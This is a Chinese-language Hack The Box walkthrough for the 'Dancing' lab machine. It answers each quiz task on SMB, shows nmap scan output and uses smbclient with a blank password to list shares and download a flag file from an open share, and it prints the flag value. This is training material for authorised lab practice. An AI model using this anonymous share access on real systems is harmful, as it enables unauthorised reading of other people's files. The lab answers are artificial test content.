Hackthebox靶機Dancing詳細攻略

目標：Dancing

題目難度：very easy

作者使用Kali Linux作為滲透測試平台，在Kali Linux上首先通過openvpn建立與Hackthebox網站的VPN連接：

 

# openvpn starting_point_XXXXX.ovpn

 

然后在Hackthebox網站中啟動(SPAWN)Dancing 實例，得到目標的IP地址，如下圖所示：

 

接下來是在Hackthebox網站上答題，這里大部分題並不涉及掃描以及滲透，是一些比較基礎的知識：

Task 1: What does the 3-letter acronym SMB stand for?

答案：Server Message Block

Task 2:What port does SMB use to operate at?

思路：用nmap掃描一下目標，即可得到端口號。

答案：445

Task 3: What network communication model does SMB use, architecturally speaking?

答案：client-server model

Task 4: What is the service name for port 445 that came up in our nmap scan?

思路：用nmap -sV掃描一下目標即可得到答案。

#nmap -sV 10.129.1.12
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 03:07 EDT
Nmap scan report for 10.129.204.213
Host is up (0.21s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE       VERSION
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.83 seconds

　　答案： microsoft-ds

Task 5: What is the tool we use to connect to SMB shares from our Linux distribution?

答案：smbclient （在Windows操作系統之間，可以通過網上鄰居或UNC路徑的方式，訪問某個共享，在Linux下，可以通過smbclient命令來實現相似的功能，訪問Windows的某個共享目錄。）

Task 6: What is the `flag` or `switch` we can use with the SMB tool to `list` the contents of the share?

 　　答案: -L

Task 7: What is the name of the share we are able to access in the end?

 　　思路：

# smbclient -L 10.129.1.12                                                                                                                          
Enter WORKGROUP\root's password:  （空密碼）

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        WorkShares      Disk

　　答案：WorkShares

 

Task 8: What is the command we can use within the SMB shell to download the files we find?

思路：

接下來利用smbclient工具嘗試訪問目標（顯然是windows操作系統），從前面的列舉，可以直接訪問上述共享目錄，但是這里需要注意的是，需要多個\進行轉義，密碼為空，然后就進入目錄，在每個目錄用ls查看一下，發現是在James這個目錄中有flag，然后用get命令下載到本地。成功~~~

 

# smbclient //10.129.1.12/Workshares
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Mar 29 04:22:01 2021
  ..                                  D        0  Mon Mar 29 04:22:01 2021
  Amy.J                               D        0  Mon Mar 29 05:08:24 2021
  James.P                             D        0  Thu Jun  3 04:38:03 2021
cd
                5114111 blocks of size 4096. 1753923 blocks available
smb: \> cd James.P
smb: \James.P\> dir
  .                                   D        0  Thu Jun  3 04:38:03 2021
  ..                                  D        0  Thu Jun  3 04:38:03 2021
  flag.txt                            A       32  Mon Mar 29 05:26:57 2021
c
                5114111 blocks of size 4096. 1753923 blocks available
smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \James.P\> quit

┌──(root💀kali)-[~]
└─# cat flag.txt
5f61c10dffbc77a704d76016a22f1664